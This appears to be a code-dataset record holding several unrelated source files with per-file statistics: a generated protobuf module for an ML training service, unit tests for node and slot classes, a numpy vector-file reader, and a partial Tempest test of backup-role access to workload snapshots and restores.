_FORECASTREQUEST.fields_by_name['study'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._STUDY
_FORECASTREQUEST.fields_by_name['datasource'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASOURCE
_FORECASTREQUEST.fields_by_name['dataset'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2._DATASET
_FORECASTREQUEST.fields_by_name['connection'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2._CONNECTION
_FORECASTREQUEST.fields_by_name['secret'].message_type = _FORECASTREQUEST_SECRETENTRY
DESCRIPTOR.message_types_by_name['TrainRequest'] = _TRAINREQUEST
DESCRIPTOR.message_types_by_name['TrainResponse'] = _TRAINRESPONSE
DESCRIPTOR.message_types_by_name['CompileRequest'] = _COMPILEREQUEST
DESCRIPTOR.message_types_by_name['CompileResponse'] = _COMPILERESPONSE
DESCRIPTOR.message_types_by_name['TestRequest'] = _TESTREQUEST
DESCRIPTOR.message_types_by_name['TestResponse'] = _TESTRESPONSE
DESCRIPTOR.message_types_by_name['TrainEnsembleRequest'] = _TRAINENSEMBLEREQUEST
DESCRIPTOR.message_types_by_name['TestEnsembleRequest'] = _TESTENSEMBLEREQUEST
DESCRIPTOR.message_types_by_name['ForecastRequest'] = _FORECASTREQUEST
DESCRIPTOR.message_types_by_name['ForecastResponse'] = _FORECASTRESPONSE
DESCRIPTOR.message_types_by_name['ShutdownRequest'] = _SHUTDOWNREQUEST
DESCRIPTOR.message_types_by_name['ShutdownResponse'] = _SHUTDOWNRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
TrainRequest = _reflection.GeneratedProtocolMessageType('TrainRequest', (_message.Message,), {
'SecretEntry' : _reflection.GeneratedProtocolMessageType('SecretEntry', (_message.Message,), {
'DESCRIPTOR' : _TRAINREQUEST_SECRETENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.SecretEntry)
})
,
'DESCRIPTOR' : _TRAINREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest)
})
_sym_db.RegisterMessage(TrainRequest)
_sym_db.RegisterMessage(TrainRequest.SecretEntry)
TrainResponse = _reflection.GeneratedProtocolMessageType('TrainResponse', (_message.Message,), {
'PipFreezeEntry' : _reflection.GeneratedProtocolMessageType('PipFreezeEntry', (_message.Message,), {
'DESCRIPTOR' : _TRAINRESPONSE_PIPFREEZEENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.PipFreezeEntry)
})
,
'FeaturesImportanceEntry' : _reflection.GeneratedProtocolMessageType('FeaturesImportanceEntry', (_message.Message,), {
'DESCRIPTOR' : _TRAINRESPONSE_FEATURESIMPORTANCEENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.FeaturesImportanceEntry)
})
,
'DESCRIPTOR' : _TRAINRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse)
})
_sym_db.RegisterMessage(TrainResponse)
_sym_db.RegisterMessage(TrainResponse.PipFreezeEntry)
_sym_db.RegisterMessage(TrainResponse.FeaturesImportanceEntry)
CompileRequest = _reflection.GeneratedProtocolMessageType('CompileRequest', (_message.Message,), {
'SecretEntry' : _reflection.GeneratedProtocolMessageType('SecretEntry', (_message.Message,), {
'DESCRIPTOR' : _COMPILEREQUEST_SECRETENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.SecretEntry)
})
,
'DESCRIPTOR' : _COMPILEREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest)
})
_sym_db.RegisterMessage(CompileRequest)
_sym_db.RegisterMessage(CompileRequest.SecretEntry)
CompileResponse = _reflection.GeneratedProtocolMessageType('CompileResponse', (_message.Message,), {
'DESCRIPTOR' : _COMPILERESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.CompileResponse)
})
_sym_db.RegisterMessage(CompileResponse)
TestRequest = _reflection.GeneratedProtocolMessageType('TestRequest', (_message.Message,), {
'SecretEntry' : _reflection.GeneratedProtocolMessageType('SecretEntry', (_message.Message,), {
'DESCRIPTOR' : _TESTREQUEST_SECRETENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.SecretEntry)
})
,
'DESCRIPTOR' : _TESTREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest)
})
_sym_db.RegisterMessage(TestRequest)
_sym_db.RegisterMessage(TestRequest.SecretEntry)
TestResponse = _reflection.GeneratedProtocolMessageType('TestResponse', (_message.Message,), {
'PipFreezeEntry' : _reflection.GeneratedProtocolMessageType('PipFreezeEntry', (_message.Message,), {
'DESCRIPTOR' : _TESTRESPONSE_PIPFREEZEENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.PipFreezeEntry)
})
,
'FeaturesImportanceEntry' : _reflection.GeneratedProtocolMessageType('FeaturesImportanceEntry', (_message.Message,), {
'DESCRIPTOR' : _TESTRESPONSE_FEATURESIMPORTANCEENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.FeaturesImportanceEntry)
})
,
'DESCRIPTOR' : _TESTRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse)
})
_sym_db.RegisterMessage(TestResponse)
_sym_db.RegisterMessage(TestResponse.PipFreezeEntry)
_sym_db.RegisterMessage(TestResponse.FeaturesImportanceEntry)
TrainEnsembleRequest = _reflection.GeneratedProtocolMessageType('TrainEnsembleRequest', (_message.Message,), {
'SecretEntry' : _reflection.GeneratedProtocolMessageType('SecretEntry', (_message.Message,), {
'DESCRIPTOR' : _TRAINENSEMBLEREQUEST_SECRETENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest.SecretEntry)
})
,
'DESCRIPTOR' : _TRAINENSEMBLEREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TrainEnsembleRequest)
})
_sym_db.RegisterMessage(TrainEnsembleRequest)
_sym_db.RegisterMessage(TrainEnsembleRequest.SecretEntry)
TestEnsembleRequest = _reflection.GeneratedProtocolMessageType('TestEnsembleRequest', (_message.Message,), {
'SecretEntry' : _reflection.GeneratedProtocolMessageType('SecretEntry', (_message.Message,), {
'DESCRIPTOR' : _TESTENSEMBLEREQUEST_SECRETENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest.SecretEntry)
})
,
'DESCRIPTOR' : _TESTENSEMBLEREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.TestEnsembleRequest)
})
_sym_db.RegisterMessage(TestEnsembleRequest)
_sym_db.RegisterMessage(TestEnsembleRequest.SecretEntry)
ForecastRequest = _reflection.GeneratedProtocolMessageType('ForecastRequest', (_message.Message,), {
'SecretEntry' : _reflection.GeneratedProtocolMessageType('SecretEntry', (_message.Message,), {
'DESCRIPTOR' : _FORECASTREQUEST_SECRETENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest.SecretEntry)
})
,
'DESCRIPTOR' : _FORECASTREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.ForecastRequest)
})
_sym_db.RegisterMessage(ForecastRequest)
_sym_db.RegisterMessage(ForecastRequest.SecretEntry)
ForecastResponse = _reflection.GeneratedProtocolMessageType('ForecastResponse', (_message.Message,), {
'DESCRIPTOR' : _FORECASTRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.ForecastResponse)
})
_sym_db.RegisterMessage(ForecastResponse)
ShutdownRequest = _reflection.GeneratedProtocolMessageType('ShutdownRequest', (_message.Message,), {
'DESCRIPTOR' : _SHUTDOWNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.ShutdownRequest)
})
_sym_db.RegisterMessage(ShutdownRequest)
ShutdownResponse = _reflection.GeneratedProtocolMessageType('ShutdownResponse', (_message.Message,), {
'DESCRIPTOR' : _SHUTDOWNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.trainerd.v1.trainerd_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.trainerd.v1.ShutdownResponse)
})
_sym_db.RegisterMessage(ShutdownResponse)
DESCRIPTOR._options = None
_TRAINREQUEST_SECRETENTRY._options = None
_TRAINRESPONSE_PIPFREEZEENTRY._options = None
_TRAINRESPONSE_FEATURESIMPORTANCEENTRY._options = None
_COMPILEREQUEST_SECRETENTRY._options = None
_TESTREQUEST_SECRETENTRY._options = None
_TESTRESPONSE_PIPFREEZEENTRY._options = None
_TESTRESPONSE_FEATURESIMPORTANCEENTRY._options = None
_TRAINENSEMBLEREQUEST_SECRETENTRY._options = None
_TESTENSEMBLEREQUEST_SECRETENTRY._options = None
_FORECASTREQUEST_SECRETENTRY._options = None
_TRAINERDSERVICE = _descriptor.ServiceDescriptor(
name='TrainerdService',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=7182,
serialized_end=8113,
methods=[
_descriptor.MethodDescriptor(
name='Train',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService.Train',
index=0,
containing_service=None,
input_type=_TRAINREQUEST,
output_type=_TRAINRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='Forecast',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService.Forecast',
index=1,
containing_service=None,
input_type=_FORECASTREQUEST,
output_type=_FORECASTRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='Test',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService.Test',
index=2,
containing_service=None,
input_type=_TESTREQUEST,
output_type=_TESTRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='TrainEnsemble',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService.TrainEnsemble',
index=3,
containing_service=None,
input_type=_TRAINENSEMBLEREQUEST,
output_type=_TRAINRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='TestEnsemble',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService.TestEnsemble',
index=4,
containing_service=None,
input_type=_TESTENSEMBLEREQUEST,
output_type=_TESTRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='Shutdown',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainerdService.Shutdown',
index=5,
containing_service=None,
input_type=_SHUTDOWNREQUEST,
output_type=_SHUTDOWNRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_TRAINERDSERVICE)
DESCRIPTOR.services_by_name['TrainerdService'] = _TRAINERDSERVICE
# @@protoc_insertion_point(module_scope)
| 58.599752
| 10,954
| 0.791859
| 12,043
| 94,580
| 5.87802
| 0.028564
| 0.03639
| 0.074588
| 0.094026
| 0.884445
| 0.866787
| 0.859667
| 0.853819
| 0.843351
| 0.815254
| 0
| 0.035377
| 0.094132
| 94,580
| 1,613
| 10,955
| 58.636082
| 0.790854
| 0.028621
| 0
| 0.712401
| 1
| 0.00066
| 0.277273
| 0.244096
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023747
| 0
| 0.023747
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
588212f39e4bea744345717e6a276e763ad997e6
| 7,471
|
py
|
Python
|
core/test/vs/test_node.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | 3
|
2021-06-20T02:24:10.000Z
|
2022-01-26T23:55:33.000Z
|
core/test/vs/test_node.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | null | null | null |
core/test/vs/test_node.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import unittest
from recc.vs.slot import SlotDirection, SlotCategory, Slot
from recc.vs.node import NodeEdge, Node
class NodeTestCase(unittest.TestCase):
def setUp(self):
self.in_flow = Slot(0, "s0", 0, "n", SlotDirection.Input, SlotCategory.Flow)
self.out_flow = Slot(1, "s1", 0, "n", SlotDirection.Output, SlotCategory.Flow)
self.in_data = Slot(2, "s2", 0, "n", SlotDirection.Input, SlotCategory.Data)
self.out_data = Slot(3, "s3", 0, "n", SlotDirection.Output, SlotCategory.Data)
def test_default(self):
node0 = Node(0, "n0", NodeEdge.Begin)
node1 = Node(1, "n1", NodeEdge.Middle)
node2 = Node(2, "n2", NodeEdge.End)
self.assertEqual(0, node0.key)
self.assertEqual(1, node1.key)
self.assertEqual(2, node2.key)
self.assertEqual("n0", node0.name)
self.assertEqual("n1", node1.name)
self.assertEqual("n2", node2.name)
self.assertEqual(NodeEdge.Begin, node0.edge)
self.assertEqual(NodeEdge.Middle, node1.edge)
self.assertEqual(NodeEdge.End, node2.edge)
def test_begin_node(self):
node = Node(0, "n", NodeEdge.Begin)
self.assertRaises(AssertionError, node.add_in_flow, self.in_flow)
self.assertRaises(AssertionError, node.add_in_flow, self.out_flow)
self.assertRaises(AssertionError, node.add_in_flow, self.in_data)
self.assertRaises(AssertionError, node.add_in_flow, self.out_data)
self.assertRaises(AssertionError, node.add_out_flow, self.in_flow)
node.add_out_flow(self.out_flow)
self.assertRaises(AssertionError, node.add_out_flow, self.in_data)
self.assertRaises(AssertionError, node.add_out_flow, self.out_data)
self.assertRaises(AssertionError, node.add_in_data, self.in_flow)
self.assertRaises(AssertionError, node.add_in_data, self.out_flow)
node.add_in_data(self.in_data)
self.assertRaises(AssertionError, node.add_in_data, self.out_data)
self.assertRaises(AssertionError, node.add_out_data, self.in_flow)
self.assertRaises(AssertionError, node.add_out_data, self.out_flow)
self.assertRaises(AssertionError, node.add_out_data, self.in_data)
node.add_out_data(self.out_data)
self.assertEqual(0, node.get_in_flows_count())
self.assertEqual(1, node.get_out_flows_count())
self.assertEqual(1, node.get_in_datas_count())
self.assertEqual(1, node.get_out_datas_count())
self.assertEqual(3, node.get_slot_count())
self.assertEqual(1, node.get_inputs_count())
self.assertEqual(2, node.get_outputs_count())
self.assertRaises(KeyError, node.remove_slot, self.in_flow)
node.remove_slot(self.out_flow)
node.remove_slot(self.in_data)
node.remove_slot(self.out_data)
self.assertEqual(0, node.get_in_flows_count())
self.assertEqual(0, node.get_out_flows_count())
self.assertEqual(0, node.get_in_datas_count())
self.assertEqual(0, node.get_out_datas_count())
self.assertEqual(0, node.get_slot_count())
self.assertEqual(0, node.get_inputs_count())
self.assertEqual(0, node.get_outputs_count())
def test_middle_node(self):
node = Node(0, "n", NodeEdge.Middle)
node.add_in_flow(self.in_flow)
self.assertRaises(AssertionError, node.add_in_flow, self.out_flow)
self.assertRaises(AssertionError, node.add_in_flow, self.in_data)
self.assertRaises(AssertionError, node.add_in_flow, self.out_data)
self.assertRaises(AssertionError, node.add_out_flow, self.in_flow)
node.add_out_flow(self.out_flow)
self.assertRaises(AssertionError, node.add_out_flow, self.in_data)
self.assertRaises(AssertionError, node.add_out_flow, self.out_data)
self.assertRaises(AssertionError, node.add_in_data, self.in_flow)
self.assertRaises(AssertionError, node.add_in_data, self.out_flow)
node.add_in_data(self.in_data)
self.assertRaises(AssertionError, node.add_in_data, self.out_data)
self.assertRaises(AssertionError, node.add_out_data, self.in_flow)
self.assertRaises(AssertionError, node.add_out_data, self.out_flow)
self.assertRaises(AssertionError, node.add_out_data, self.in_data)
node.add_out_data(self.out_data)
self.assertEqual(1, node.get_in_flows_count())
self.assertEqual(1, node.get_out_flows_count())
self.assertEqual(1, node.get_in_datas_count())
self.assertEqual(1, node.get_out_datas_count())
self.assertEqual(4, node.get_slot_count())
self.assertEqual(2, node.get_inputs_count())
self.assertEqual(2, node.get_outputs_count())
node.remove_slot(self.in_flow)
node.remove_slot(self.out_flow)
node.remove_slot(self.in_data)
node.remove_slot(self.out_data)
self.assertEqual(0, node.get_in_flows_count())
self.assertEqual(0, node.get_out_flows_count())
self.assertEqual(0, node.get_in_datas_count())
self.assertEqual(0, node.get_out_datas_count())
self.assertEqual(0, node.get_slot_count())
self.assertEqual(0, node.get_inputs_count())
self.assertEqual(0, node.get_outputs_count())
def test_end_node(self):
node = Node(0, "n", NodeEdge.End)
node.add_in_flow(self.in_flow)
self.assertRaises(AssertionError, node.add_in_flow, self.out_flow)
self.assertRaises(AssertionError, node.add_in_flow, self.in_data)
self.assertRaises(AssertionError, node.add_in_flow, self.out_data)
self.assertRaises(AssertionError, node.add_out_flow, self.in_flow)
self.assertRaises(AssertionError, node.add_out_flow, self.out_flow)
self.assertRaises(AssertionError, node.add_out_flow, self.in_data)
self.assertRaises(AssertionError, node.add_out_flow, self.out_data)
self.assertRaises(AssertionError, node.add_in_data, self.in_flow)
self.assertRaises(AssertionError, node.add_in_data, self.out_flow)
node.add_in_data(self.in_data)
self.assertRaises(AssertionError, node.add_in_data, self.out_data)
self.assertRaises(AssertionError, node.add_out_data, self.in_flow)
self.assertRaises(AssertionError, node.add_out_data, self.out_flow)
self.assertRaises(AssertionError, node.add_out_data, self.in_data)
node.add_out_data(self.out_data)
self.assertEqual(1, node.get_in_flows_count())
self.assertEqual(0, node.get_out_flows_count())
self.assertEqual(1, node.get_in_datas_count())
self.assertEqual(1, node.get_out_datas_count())
self.assertEqual(3, node.get_slot_count())
self.assertEqual(2, node.get_inputs_count())
self.assertEqual(1, node.get_outputs_count())
node.remove_slot(self.in_flow)
self.assertRaises(KeyError, node.remove_slot, self.out_flow)
node.remove_slot(self.in_data)
node.remove_slot(self.out_data)
self.assertEqual(0, node.get_in_flows_count())
self.assertEqual(0, node.get_out_flows_count())
self.assertEqual(0, node.get_in_datas_count())
self.assertEqual(0, node.get_out_datas_count())
self.assertEqual(0, node.get_slot_count())
self.assertEqual(0, node.get_inputs_count())
self.assertEqual(0, node.get_outputs_count())
if __name__ == "__main__":
unittest.main()
| 46.403727
| 86
| 0.703253
| 1,029
| 7,471
| 4.819242
| 0.061224
| 0.154265
| 0.229885
| 0.260536
| 0.869732
| 0.843517
| 0.843114
| 0.817705
| 0.817705
| 0.805606
| 0
| 0.013414
| 0.18177
| 7,471
| 160
| 87
| 46.69375
| 0.797808
| 0.002811
| 0
| 0.719697
| 0
| 0
| 0.004699
| 0
| 0
| 0
| 0
| 0
| 0.689394
| 1
| 0.037879
| false
| 0
| 0.022727
| 0
| 0.068182
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5435399d5814112d5c02f989b0ceca61c9385ed3
| 860
|
py
|
Python
|
archive/MCQ/datasets/utils.py
|
dreinq/DeepQ
|
abb6d8b492f802fefbc0095e8719377dc708069c
|
[
"Apache-2.0"
] | null | null | null |
archive/MCQ/datasets/utils.py
|
dreinq/DeepQ
|
abb6d8b492f802fefbc0095e8719377dc708069c
|
[
"Apache-2.0"
] | null | null | null |
archive/MCQ/datasets/utils.py
|
dreinq/DeepQ
|
abb6d8b492f802fefbc0095e8719377dc708069c
|
[
"Apache-2.0"
] | 1
|
2020-11-23T09:13:58.000Z
|
2020-11-23T09:13:58.000Z
|
import numpy as np
def fvecs_read(filename, c_contiguous=True):
fv = np.fromfile(filename, dtype=np.float32)
if fv.size == 0:
return np.zeros((0, 0))
dim = fv.view(np.int32)[0]
assert dim > 0
fv = fv.reshape(-1, 1 + dim)
if not all(fv.view(np.int32)[:, 0] == dim):
raise IOError("Non-uniform vector sizes in " + filename)
fv = fv[:, 1:]
if c_contiguous:
fv = fv.copy()
return fv
def ivecs_read(filename, c_contiguous=True):
fv = np.fromfile(filename, dtype=np.int32)
if fv.size == 0:
return np.zeros((0, 0))
dim = fv.view(np.int32)[0]
assert dim > 0
fv = fv.reshape(-1, 1 + dim)
if not all(fv.view(np.int32)[:, 0] == dim):
raise IOError("Non-uniform vector sizes in " + filename)
fv = fv[:, 1:]
if c_contiguous:
fv = fv.copy()
return fv
| 27.741935
| 64
| 0.575581
| 136
| 860
| 3.595588
| 0.272059
| 0.04908
| 0.06544
| 0.106339
| 0.912065
| 0.912065
| 0.912065
| 0.912065
| 0.912065
| 0.912065
| 0
| 0.047695
| 0.268605
| 860
| 30
| 65
| 28.666667
| 0.72973
| 0
| 0
| 0.814815
| 0
| 0
| 0.065116
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 1
| 0.074074
| false
| 0
| 0.037037
| 0
| 0.259259
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49b54a0e957fe3863e5702ede37c8b274e16ef3f
| 15,963
|
py
|
Python
|
tempest/api/workloadmgr/rbac/test_tvault_rbac_backuprole_touser_policyjson.py
|
deepanshusagar/tempest-1
|
2c7609ef72a606e2b6c39d185f98aa28b4d20afa
|
[
"Apache-2.0"
] | null | null | null |
tempest/api/workloadmgr/rbac/test_tvault_rbac_backuprole_touser_policyjson.py
|
deepanshusagar/tempest-1
|
2c7609ef72a606e2b6c39d185f98aa28b4d20afa
|
[
"Apache-2.0"
] | null | null | null |
tempest/api/workloadmgr/rbac/test_tvault_rbac_backuprole_touser_policyjson.py
|
deepanshusagar/tempest-1
|
2c7609ef72a606e2b6c39d185f98aa28b4d20afa
|
[
"Apache-2.0"
] | null | null | null |
import sys
import os
sys.path.append(os.getcwd())
from tempest.api.workloadmgr import base
from tempest import config
from tempest import test
from oslo_log import log as logging
from tempest import tvaultconf
from tempest import reporting
from tempest import command_argument_string
from tempest.util import cli_parser
from tempest.util import query_data
import time
LOG = logging.getLogger(__name__)
CONF = config.CONF
class WorkloadsTest(base.BaseWorkloadmgrTest):
credentials = ['primary']
@classmethod
def setup_clients(cls):
super(WorkloadsTest, cls).setup_clients()
cls.client = cls.os.wlm_client
reporting.add_test_script(str(__name__))
@test.attr(type='smoke')
@test.idempotent_id('dbb758aa-b3af-40ac-9105-705b1f18cbd8')
def test_tvault_rbac_backuprole_touser_policyjson(self):
try:
# Change policy.json file on tvault to change role and rule
self.change_policyjson_file("backup", "backup_api")
self.instances_id = []
# Create volume, Launch an Instance
floating_ips_list = self.get_floating_ips()
self.volumes_id = self.create_volume(volume_cleanup=False)
LOG.debug("Volume-1 ID: " + str(self.volumes_id))
self.instances_id.append(self.create_vm(vm_cleanup=False))
LOG.debug("VM-1 ID: " + str(self.instances_id[0]))
self.attach_volume(self.volumes_id, self.instances_id[0])
LOG.debug("Volume attached")
self.set_floating_ip(floating_ips_list[0], self.instances_id[0])
# Use backupuser credentials
os.environ['OS_USERNAME']= CONF.identity.backupuser
os.environ['OS_PASSWORD']= CONF.identity.backupuser_password
# Create workload with CLI by backup role
workload_create = command_argument_string.workload_create + " --instance instance-id=" +str(self.instances_id[0])
rc = cli_parser.cli_returncode(workload_create)
if rc != 0:
LOG.debug("workload creation unsuccessful by backup role")
raise Exception ("RBAC policy fails for workload creation by backup role")
else:
LOG.debug("Workload created successfully by backup role")
reporting.add_test_step("Execute workload_create command by backup role", tvaultconf.PASS)
time.sleep(10)
self.wid1 = query_data.get_workload_id(tvaultconf.workload_name)
workload_available = self.wait_for_workload_tobe_available(self.wid1)
# Run snapshot_create CLI by backup role
snapshot_create = command_argument_string.snapshot_create + str(self.wid1)
LOG.debug("snapshot_create command: " + str(snapshot_create))
rc = cli_parser.cli_returncode(snapshot_create)
if rc != 0:
reporting.add_test_step("Execute snapshot_create command by backup role", tvaultconf.FAIL)
raise Exception("Command snapshot_create did not execute correctly by backup role")
else:
reporting.add_test_step("Execute snapshot_create command by backup role", tvaultconf.PASS)
LOG.debug("Command snapshot_create executed correctly by backup role")
self.snapshot_id1 = query_data.get_inprogress_snapshot_id(self.wid1)
wc = self.wait_for_snapshot_tobe_available(self.wid1, self.snapshot_id1)
#Delete the original instance
self.delete_vm(self.instances_id[0])
LOG.debug("Instance deleted successfully for restore")
#Delete corresponding volume
self.delete_volume(self.volumes_id)
LOG.debug("Volume deleted successfully for restore")
#Create one-click restore using CLI command by backup role
restore_command = command_argument_string.oneclick_restore + " " + str(self.snapshot_id1)
rc = cli_parser.cli_returncode(restore_command)
if rc != 0:
reporting.add_test_step("Execute snapshot-oneclick-restore command by backup role", tvaultconf.FAIL)
raise Exception("Command one-click restore did not execute correctly by backup role")
else:
reporting.add_test_step("Execute snapshot-oneclick-restore command by backup role", tvaultconf.PASS)
LOG.debug("Command one-click restore executed correctly backup role")
wc = self.wait_for_snapshot_tobe_available(self.wid1, self.snapshot_id1)
self.restore_id1 = query_data.get_snapshot_restore_id(self.snapshot_id1)
LOG.debug("Restore ID: " + str(self.restore_id1))
self.restore_vm_id1 = self.get_restored_vm_list(self.restore_id1)
LOG.debug("Restore VM ID: " + str(self.restore_vm_id1))
self.restore_volume_id1 = self.get_restored_volume_list(self.restore_id1)
LOG.debug("Restore Volume ID: " + str(self.restore_volume_id1))
# Use admin credentials
os.environ['OS_USERNAME']= CONF.identity.username
os.environ['OS_PASSWORD']= CONF.identity.password
# Create workload with CLI by admin role
workload_create = command_argument_string.workload_create + " --instance instance-id=" +str(self.restore_vm_id1)
rc = cli_parser.cli_returncode(workload_create)
if rc != 0:
LOG.debug("Command workload_create did not execute correctly by admin role")
reporting.add_test_step("Can not execute workload_create command by admin role", tvaultconf.PASS)
else:
reporting.add_test_step("Command workload_create did not execute correctly by admin role", tvaultconf.FAIL)
raise Exception("Command workload_create executed correctly by admin role")
# Run snapshot_create CLI by admin role
snapshot_create = command_argument_string.snapshot_create + str(self.wid1)
LOG.debug("snapshot_create command: " + str(snapshot_create))
rc = cli_parser.cli_returncode(snapshot_create)
if rc != 0:
reporting.add_test_step("Can not execute snapshot_create command by admin role", tvaultconf.PASS)
LOG.debug("Command snapshot_create did not execute correctly by admin role")
else:
reporting.add_test_step("Can not execute snapshot_create command by admin role", tvaultconf.FAIL)
raise Exception("Command snapshot_create executed correctly by admin role")
#Create one-click restore using CLI command by admin role
restore_command = command_argument_string.oneclick_restore + " " + str(self.snapshot_id1)
